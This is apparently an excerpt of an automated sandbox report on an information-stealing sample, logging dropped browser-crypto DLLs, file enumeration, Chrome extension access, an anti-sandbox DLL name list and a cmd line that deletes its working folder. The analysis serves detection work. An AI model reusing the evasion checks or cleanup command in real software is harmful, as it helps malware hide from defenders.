                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: file.exeReversingLabs: Detection: 42%
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00417645
                  Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                  Source: sqls[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384A56 push ecx; ret 0_2_00384A69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004191D5 push ecx; ret 1_2_004191E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC6B536 push ecx; ret 1_2_6CC6B549
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KECBFBAEBKJJ\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00417645
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KECBFBAEBKJJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KECBFBAEBKJJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\KECBFBAEBKJJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 3660Thread sleep count: 86 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h1_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394303 FindFirstFileExW,0_2_00394303
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,1_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FE81 GetSystemInfo,wsprintfA,1_2_0040FE81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
